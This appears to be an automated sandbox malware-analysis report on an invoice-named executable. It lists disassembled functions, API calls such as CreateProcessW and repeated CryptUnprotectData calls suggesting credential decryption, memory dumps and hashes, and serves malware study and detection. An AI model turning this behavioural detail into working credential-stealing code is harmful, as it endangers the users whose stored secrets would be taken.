                                                                                                                                  • Instruction ID: bbbd3ef8f6d6f34ea5303db1c751cd258066777a1c36f61d7f193cbbff11b307
                                                                                                                                  • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                                  • Instruction Fuzzy Hash: B701BC32510209EBDF21CF50CD09EDF3BA8EB04360F01803AFD06A6191D738DA68CBA4
                                                                                                                                  Function 0040586D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004058A3
                                                                                                                                  Strings
                                                                                                                                  • Error launching installer, xrefs: 00405880
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                  • String ID: Error launching installer
                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                  • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                                                                                  • Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
                                                                                                                                  • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                                                                                  • Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78
                                                                                                                                  Function 004038DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75573420,004038B7,004036CD,00000006,?,00000006,00000008,0000000A), ref: 004038F9
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00403900
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004038F1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Free$GlobalLibrary
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                  • API String ID: 1100898210-4083868402
                                                                                                                                  • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                                                                                  • Instruction ID: bd2e2babf5735c078d8cab401dc84ea4626969b40d457a48d01b9ed958f4fa52
                                                                                                                                  • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                                                                                  • Instruction Fuzzy Hash: D6E01D339111305FC6315F55ED0475E77A95F54F22F05457BF8807716047745C925BD8
                                                                                                                                  Function 00405BA5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BAB
                                                                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharPrevlstrlen
                                                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                                                  • API String ID: 2709904686-1876063424
                                                                                                                                  • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                  • Instruction ID: 7007ae8f4af5416befc6157b9dfefed4fe058ad6210d844be01a540b02b626a9
                                                                                                                                  • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                                                  • Instruction Fuzzy Hash: 2ED05EB3411A209AD3226B04DD04D9F77B8EF51304746446AE840A61A6D7B87D8186AC
                                                                                                                                  Function 6FF410E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6FF4116A
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF411C7
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF411D9
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6FF41203
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1913284405.000000006FF41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FF40000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1913259561.000000006FF40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1913297381.000000006FF43000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1913309870.000000006FF45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ff40000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Free$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1780285237-0
                                                                                                                                  • Opcode ID: 3a1d140ce9d7790a8ac4679739220dcfd0eec311042a48324d49bf86b216b017
                                                                                                                                  • Instruction ID: e382d621075a2ad45854d82a377b84f7f7e651598818a4affde7a12d22ca8790
                                                                                                                                  • Opcode Fuzzy Hash: 3a1d140ce9d7790a8ac4679739220dcfd0eec311042a48324d49bf86b216b017
                                                                                                                                  • Instruction Fuzzy Hash: 3331A1B24102059BDB029F78D945B667FECFF96320B10021AEC44E7363E774E9758B21
                                                                                                                                  Function 00405CDF Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
                                                                                                                                  • CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                  • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                  • Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
                                                                                                                                  • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                  • Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:8.9%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:11.5%
                                                                                                                                  Total number of Nodes:96
                                                                                                                                  Total number of Limit Nodes:9
                                                                                                                                  execution_graph 66606 39488b98 66607 39488bc0 66606->66607 66610 39488bec 66606->66610 66608 39488bc9 66607->66608 66611 39488064 66607->66611 66612 3948806f 66611->66612 66613 39488ee3 66612->66613 66615 39488080 66612->66615 66613->66610 66616 39488f18 OleInitialize 66615->66616 66617 39488f7c 66616->66617 66617->66613 66507 393996f8 66508 3939973e GetCurrentProcess 66507->66508 66510 39399789 66508->66510 66511 39399790 GetCurrentThread 66508->66511 66510->66511 66512 393997cd GetCurrentProcess 66511->66512 66513 393997c6 66511->66513 66514 39399803 66512->66514 66513->66512 66515 3939982b GetCurrentThreadId 66514->66515 66516 3939985c 66515->66516 66618 39484290 66619 394842f8 CreateWindowExW 66618->66619 66621 394843b4 66619->66621 66622 39399940 DuplicateHandle 66623 393999d6 66622->66623 66517 15e018 66518 15e024 66517->66518 66526 39177b77 66518->66526 66530 39177b78 66518->66530 66534 39177b69 66518->66534 66519 15e1d4 66538 391e5fc7 66519->66538 66542 391e5fd8 66519->66542 66520 15e2e5 66528 39177b9a 66526->66528 66527 39178029 66527->66519 66528->66527 66546 39178431 66528->66546 66532 39177b9a 66530->66532 66531 39178029 66531->66519 66532->66531 66533 39178431 CryptUnprotectData 66532->66533 66533->66532 66536 39177b70 66534->66536 66535 39178029 66535->66519 66536->66535 66537 39178431 CryptUnprotectData 66536->66537 66537->66536 66540 391e5ffa 66538->66540 66539 391e64c9 66539->66520 66540->66539 66541 39178431 CryptUnprotectData 66540->66541 66541->66540 66544 391e5ffa 66542->66544 66543 391e64c9 66543->66520 66544->66543 66545 39178431 CryptUnprotectData 66544->66545 66545->66544 66547 39178440 66546->66547 66551 39178a59 66547->66551 66558 39178a68 66547->66558 66548 391784b0 66548->66528 66553 39178a68 66551->66553 66552 39178b41 66565 391787a8 66552->66565 66553->66552 66556 39178a59 CryptUnprotectData 66553->66556 66557 39178a68 CryptUnprotectData 66553->66557 66556->66552 66557->66552 66559 39178a8d 66558->66559 66562 39178b41 66558->66562 66559->66562 66563 39178a59 CryptUnprotectData 66559->66563 66564 39178a68 CryptUnprotectData 66559->66564 66560 391787a8 CryptUnprotectData 66561 39178d0d 66560->66561 66561->66548 66562->66560 66563->66562 66564->66562 66566 39178ef8 CryptUnprotectData 66565->66566 66567 39178d0d 66566->66567 66567->66548 66568 ad044 66569 ad05c 66568->66569 66570 ad0b6 66569->66570 66574 39484448 66569->66574 66578 39485198 66569->66578 66585 3948186c 66569->66585 66575 3948446e 66574->66575 66576 3948186c CallWindowProcW 66575->66576 66577 3948448f 66576->66577 66577->66570 66581 394851d5 66578->66581 66579 39485209 66596 39481994 66579->66596 66581->66579 66582 394851f9 66581->66582 66592 39485330 66582->66592 66583 39485207 66586 39481877 66585->66586 66587 39485209 66586->66587 66589 394851f9 66586->66589 66588 39481994 CallWindowProcW 66587->66588 66590 39485207 66588->66590 66591 39485330 CallWindowProcW 66589->66591 66591->66590 66594 39485344 66592->66594 66593 394853d0 66593->66583 66600 394853e8 66594->66600 66597 3948199f 66596->66597 66598 39486a19 66597->66598 66599 39486a6a CallWindowProcW 66597->66599 66598->66583 66599->66598 66601 394853f9 66600->66601 66603 39486996 66600->66603 66601->66593 66604 39481994 CallWindowProcW 66603->66604 66605 394869ba 66604->66605 66605->66601

                                                                                                                                  Executed Functions

                                                                                                                                  Function 38F85028 Relevance: 4.3, Strings: 1, Instructions: 3069COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: N
                                                                                                                                  • API String ID: 0-1130791706
                                                                                                                                  • Opcode ID: 9808fc2bb6274ac5dc108f63ef1c789571861608bb81e8d4df4b308f9a92a924
                                                                                                                                  • Instruction ID: 95db7438f39878b41ee03089fd54d98ae8b3790d51d8fc7a2212747418f2a3fd
                                                                                                                                  • Opcode Fuzzy Hash: 9808fc2bb6274ac5dc108f63ef1c789571861608bb81e8d4df4b308f9a92a924
                                                                                                                                  • Instruction Fuzzy Hash: 7B73E331D10B5A8EDB11EF68C954A99F7B1FF99300F51C69AE44877221EB70AAC4CF81
                                                                                                                                  Function 39178EF1 Relevance: 1.6, APIs: 1, Instructions: 56encryptionCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 39178F5D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 834300711-0
                                                                                                                                  • Opcode ID: edfe6520d174f7f29618fe410de85b6d9e5bcc18effc214db6f8ca13408a976c
                                                                                                                                  • Instruction ID: 61d8759b9bb723195f1c7ba11a44d580bd5cb239ad7b0d44a16b62fa17ed23ac
                                                                                                                                  • Opcode Fuzzy Hash: edfe6520d174f7f29618fe410de85b6d9e5bcc18effc214db6f8ca13408a976c
                                                                                                                                  • Instruction Fuzzy Hash: 7C2159768003499FDB10DFA9C841BDEBFF5EF48320F148459E558A7210C379A950CFA1
                                                                                                                                  Function 391787A8 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 39178F5D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CryptDataUnprotect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 834300711-0
                                                                                                                                  • Opcode ID: 6a1f12ad801ea4fdfaf3e3a86f1617f56482cd86055b19ef8a2ca792775337c8
                                                                                                                                  • Instruction ID: e4ac1897c253107a49edc891c53bf8a22622435a10fd7c3bf8c16af9d83d9c96
                                                                                                                                  • Opcode Fuzzy Hash: 6a1f12ad801ea4fdfaf3e3a86f1617f56482cd86055b19ef8a2ca792775337c8
                                                                                                                                  • Instruction Fuzzy Hash: 601126B680034ADFDB10DF9AC844BDEBBF5EF48320F148459E518A7210C779A950DFA5
                                                                                                                                  Function 00159DE0 Relevance: 1.1, Instructions: 1137COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 90fda1e91199de16e0c962e6824baa355996fbe8885413651e4f5614edea0b98
                                                                                                                                  • Instruction ID: bce6079c39b5d66423b9fa0c1b7c8b8e11a4437b20cf53afcb348484dd4627fa
                                                                                                                                  • Opcode Fuzzy Hash: 90fda1e91199de16e0c962e6824baa355996fbe8885413651e4f5614edea0b98
                                                                                                                                  • Instruction Fuzzy Hash: A1A27130A40205CFCB15CFA8C994AAEBBF2BF88301F558659E815DF261D731ED89CB52
                                                                                                                                  Function 3920D710 Relevance: .7, Instructions: 745COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fe660a9dee395c86d19a97f030f1f1bc8ffae4fd7609788d0a97f45ba4719a33
                                                                                                                                  • Instruction ID: da7223e0c7abfee50550962c207733d30c7af55892c17f768c5b538b5a8b2bd6
                                                                                                                                  • Opcode Fuzzy Hash: fe660a9dee395c86d19a97f030f1f1bc8ffae4fd7609788d0a97f45ba4719a33
                                                                                                                                  • Instruction Fuzzy Hash: B7824B74E012288FDB65DF69CD94BDDBBB2BB89301F1081E9990DA7261DB305E81DF81
                                                                                                                                  Function 001529E0 Relevance: .7, Instructions: 685COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6f76ffc7393c1b102573c12e97d4556ed232c28e4c9b4c6e0eafa79e374d0404
                                                                                                                                  • Instruction ID: 7fbca0ec5554fd6f10093b32647ef030b1c917f55522ea78bf171822fcb7d386
                                                                                                                                  • Opcode Fuzzy Hash: 6f76ffc7393c1b102573c12e97d4556ed232c28e4c9b4c6e0eafa79e374d0404
                                                                                                                                  • Instruction Fuzzy Hash: F0325C6680D7D48FCB638B744CA825B7FB16B92105B8945DFC4C78B687EB28C609C362
                                                                                                                                  Function 38F89328 Relevance: .5, Instructions: 531COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d0066c861d5e46f0f2855e8e67b5434d61df0805eb1cc75786d563f6c678240a
                                                                                                                                  • Instruction ID: a8c4de627fd390345f8137cb6640e7df13749dc12a3a6f63fd69273fb869593e
                                                                                                                                  • Opcode Fuzzy Hash: d0066c861d5e46f0f2855e8e67b5434d61df0805eb1cc75786d563f6c678240a
                                                                                                                                  • Instruction Fuzzy Hash: 9D221874E00218CFEB14DFA9C884B9DBBB2BF88304F5085A9D449AB395DB359D86CF51
                                                                                                                                  Function 001569A0 Relevance: .5, Instructions: 515COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a8ef4ab2e75690fde12cfbf81131823a938eb8a4bfa360d059bfad3b16d32aeb
                                                                                                                                  • Instruction ID: b60c68558daa5451042203beb67aa48d2166a8a8a12c1ef058eee0ac94954b9c
                                                                                                                                  • Opcode Fuzzy Hash: a8ef4ab2e75690fde12cfbf81131823a938eb8a4bfa360d059bfad3b16d32aeb
                                                                                                                                  • Instruction Fuzzy Hash: 03125E70A00219CFDB14DFA9C854BAEBBF6BF88301F608569E855EB391DB309D45CB90
                                                                                                                                  Function 00156FC8 Relevance: .5, Instructions: 451COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d59777c0379616a8bf75568e70ddc2af494265f776d7affe5fb1f8d8e78ad9f3
                                                                                                                                  • Instruction ID: 111d2fe1d9d8fd90215aaa10eb13b8231f11c98dee75d7bec11d6f40de2db8b0
                                                                                                                                  • Opcode Fuzzy Hash: d59777c0379616a8bf75568e70ddc2af494265f776d7affe5fb1f8d8e78ad9f3
                                                                                                                                  • Instruction Fuzzy Hash: F9025030A04219DFCB15CF68E985AADBBF2BF89312F158069EC25EB2A1D730DD45CB51
                                                                                                                                  Function 391E5FD8 Relevance: .3, Instructions: 300COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a4393f60a8717d838190fe978fc16ce936d289d192d2d4ab5eca7452c2550217
                                                                                                                                  • Instruction ID: 238ff6a3cb70b997bb7424641822987bc4a8a1161d49074c7e96a84b4986dcf3
                                                                                                                                  • Opcode Fuzzy Hash: a4393f60a8717d838190fe978fc16ce936d289d192d2d4ab5eca7452c2550217
                                                                                                                                  • Instruction Fuzzy Hash: FFE1BDB4E00218CFEB24DFA9C944B9DBBB2BF89304F2081A9D809B7355DB355A85CF51
                                                                                                                                  Function 39177B78 Relevance: .3, Instructions: 296COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ce0a1a15042c1d8d49556b6e5e2833c060ba1d0936d59db73089d4aad558f6fa
